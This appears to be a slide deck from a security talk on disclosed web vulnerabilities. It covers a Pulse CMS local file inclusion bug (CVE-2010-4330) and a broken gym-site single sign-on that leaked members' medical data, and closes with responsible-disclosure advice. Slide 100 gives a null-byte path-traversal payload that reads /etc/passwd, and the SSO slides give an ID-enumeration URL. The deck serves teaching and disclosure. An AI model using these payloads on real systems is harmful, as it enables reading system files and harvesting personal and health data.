    100. 100. Pulse CMS Local File InclusionVulnerable Code$page = $_REQUEST[p];switch ($page) { case $page: include("includes/". $page .".php"); break;}Exploitindex.php?p=/../../../../../../../../../../../../../../etc/passwd%00Why The Code Sucks•This method to prevent LFI is easily defeated with magic_quotes_gpc disabled•There’s no sanitization or regex used to prevent LFI attacks•Null-byte attacks are a problem with PHP (C-based) and need to be considered
    101. 101. Pulse CMS Remediation
    102. 102. Pulse CMS RemediationCVE-2010-4330
    103. 103. Pulse CMS RemediationCVE-2010-4330Vendor patched the current version immediatelyand then released a few version a few days later
    104. 104. Pulse CMS RemediationCVE-2010-4330Vendor patched the current version immediatelyand then released a few version a few days laterNull-byte attacks are a real problem andprogrammers need to program with it in mind
    105. 105. Pulse CMS RemediationCVE-2010-4330Vendor patched the current version immediatelyand then released a few version a few days laterNull-byte attacks are a real problem andprogrammers need to program with it in mindFile inclusion from a user-controlled variableshould heavily interrogated (regex/sanitization)
    106. 106. Tale #3 - SaaS Gone Wrong
    107. 107. Tale #3 - SaaS Gone WrongScenario: You sign-up for a gym membership
    108. 108. Tale #3 - SaaS Gone WrongScenario: You sign-up for a gym membershipProblem: Your gym’s online fitness integrationweb site has broken Single Sign-On causingmassive PII/PHI leakage
    109. 109. SSO “Bypass”
    110. 110. SSO “Bypass”Vulnerable CodeHave no access to companyʼs site code, but hereʼs my best guess...checkAuthentication($memberid, $gymid) { //Implement this later, kthx!}
    111. 111. SSO “Bypass”Vulnerable CodeHave no access to companyʼs site code, but hereʼs my best guess...checkAuthentication($memberid, $gymid) { //Implement this later, kthx!}Exploithttp://www.example.com/diff/partners/member_activate.aspx?memberid=[memberid_integer]&gymid=[gymid_integer]
    112. 112. SSO “Bypass”Vulnerable CodeHave no access to companyʼs site code, but hereʼs my best guess...checkAuthentication($memberid, $gymid) { //Implement this later, kthx!}Exploithttp://www.example.com/diff/partners/member_activate.aspx?memberid=[memberid_integer]&gymid=[gymid_integer]Why The Code Sucks•It didn’t require users to ‘sign-up’ for some of their data to be available•Complete SSO implementation failure•No one could have possibly tested/QA’ed this code before it was launched
    113. 113. Vulnerability Verification
    114. 114. Vulnerability VerificationScript #1: Out of 10,000 sequential memberidvalues roughly 2,700 accounts existed in either anactivated or unactivated state.
    115. 115. Vulnerability VerificationScript #1: Out of 10,000 sequential memberidvalues roughly 2,700 accounts existed in either anactivated or unactivated state.Script #2: Of the 1,000 memberid valueschecked, 76 accounts were activated. One userprofile had a picture, eight users had listed phonenumbers, and at least one user had a medicalquestionnaire filled-out.
    116. 116. Information Being Disclosed
    117. 117. Information Being DisclosedUnactivated Account: First Name, Last Name,Date of Birth, Gender, and E-Mail Address
    118. 118. Information Being DisclosedUnactivated Account: First Name, Last Name,Date of Birth, Gender, and E-Mail AddressActivated Account: Photo, First Name, LastName, Date of Birth, Gender, E-Mail Address,Phone Number, Height, Weight, Body Fat %,Timezone, Gym Membership Company,Workout Schedule, and Medical History (bloodpressure issues, heart problems, recent surgery,pregnancy, diabetes, etc.)
    119. 119. Remediation
    120. 120. RemediationContacted CEO (small company) with a report
    121. 121. RemediationContacted CEO (small company) with a reportLots of follow-up e-mails with increasingamounts of people (read: lawyers/execs) added
    122. 122. RemediationContacted CEO (small company) with a reportLots of follow-up e-mails with increasingamounts of people (read: lawyers/execs) addedConsistently reaffirmed my commitment to helpand deflected any comments towards me beingsome kind of nefarious hacker
    123. 123. RemediationContacted CEO (small company) with a reportLots of follow-up e-mails with increasingamounts of people (read: lawyers/execs) addedConsistently reaffirmed my commitment to helpand deflected any comments towards me beingsome kind of nefarious hackerTook three weeks after successful contact tohave the issue actually fixed...
    124. 124. Customers Notified
    125. 125. Customers Notified 90,000+
    126. 126. But be careful...
    127. 127. But be careful...It’s a very thin line between committing a crimeand just trying to help a web site with a problem
    128. 128. But be careful...It’s a very thin line between committing a crimeand just trying to help a web site with a problemDon’t make threats, don’t ‘force their hand’; berespectful, professional, and continuously affirmyour desire to protect people and information
    129. 129. But be careful...It’s a very thin line between committing a crimeand just trying to help a web site with a problemDon’t make threats, don’t ‘force their hand’; berespectful, professional, and continuously affirmyour desire to protect people and informationAnyone can be sued at anytime for anything inour country -- it doesn’t mean you’re guilty, butyou can certainly lose time and money this way
    130. 130. But be careful...It’s a very thin line between committing a crimeand just trying to help a web site with a problemDon’t make threats, don’t ‘force their hand’; berespectful, professional, and continuously affirmyour desire to protect people and informationAnyone can be sued at anytime for anything inour country -- it doesn’t mean you’re guilty, butyou can certainly lose time and money this wayLet your ethics and common sense lead you...
    131. 131. Generalized Take-Aways
    132. 132. Generalized Take-AwaysDo the right thing, consistently, and peoplewon’t have much room to actually threaten you
    133. 133. Generalized Take-AwaysDo the right thing, consistently, and peoplewon’t have much room to actually threaten youFull-disclosure to the community helps to keepdevelopers and businesses accountable for theproducts and services they offer
    134. 134. Generalized Take-AwaysDo the right thing, consistently, and peoplewon’t have much room to actually threaten youFull-disclosure to the community helps to keepdevelopers and businesses accountable for theproducts and services they offerResponsible disclosure allows you to make morefriends than enemies; most people are reallyappreciative of your assistance
    135. 135. Generalized Take-AwaysDo the right thing, consistently, and peoplewon’t have much room to actually threaten youFull-disclosure to the community helps to keepdevelopers and businesses accountable for theproducts and services they offerResponsible disclosure allows you to make morefriends than enemies; most people are reallyappreciative of your assistanceVulnerability research is tediously fun! ;)
    136. 136. My Thoughts...
    137. 137. My Thoughts...Info Sec. is everyone’s responsibility
    138. 138. My Thoughts...Info Sec. is everyone’s responsibilityDon’t accept an answer of “well, we didn’t buildthis with security in mind...”
    139. 139. My Thoughts...Info Sec. is everyone’s responsibilityDon’t accept an answer of “well, we didn’t buildthis with security in mind...”Ethics and information security are not, in mymind, allowed to be separated
    140. 140. My Thoughts...Info Sec. is everyone’s responsibilityDon’t accept an answer of “well, we didn’t buildthis with security in mind...”Ethics and information security are not, in mymind, allowed to be separatedThis isn’t about 1337 ‘sploits. It’s aboutprotecting your business, your friends, yourfamily, and yourself from unethical people
    141. 141. Thanks...Jon Oberheide - Duo SecuritySteve Christy - MITRETodd Jarvis - Packet Storm Security
    142. 142. ContactE-Mail: mark.stanislav@gmail.comTwitter: @markstanislavWebsite: http://www.uncompiled.com
    1. A particular slide catching your eye?

      Clipping is a handy way to collect important slides you want to go back to later.

    ×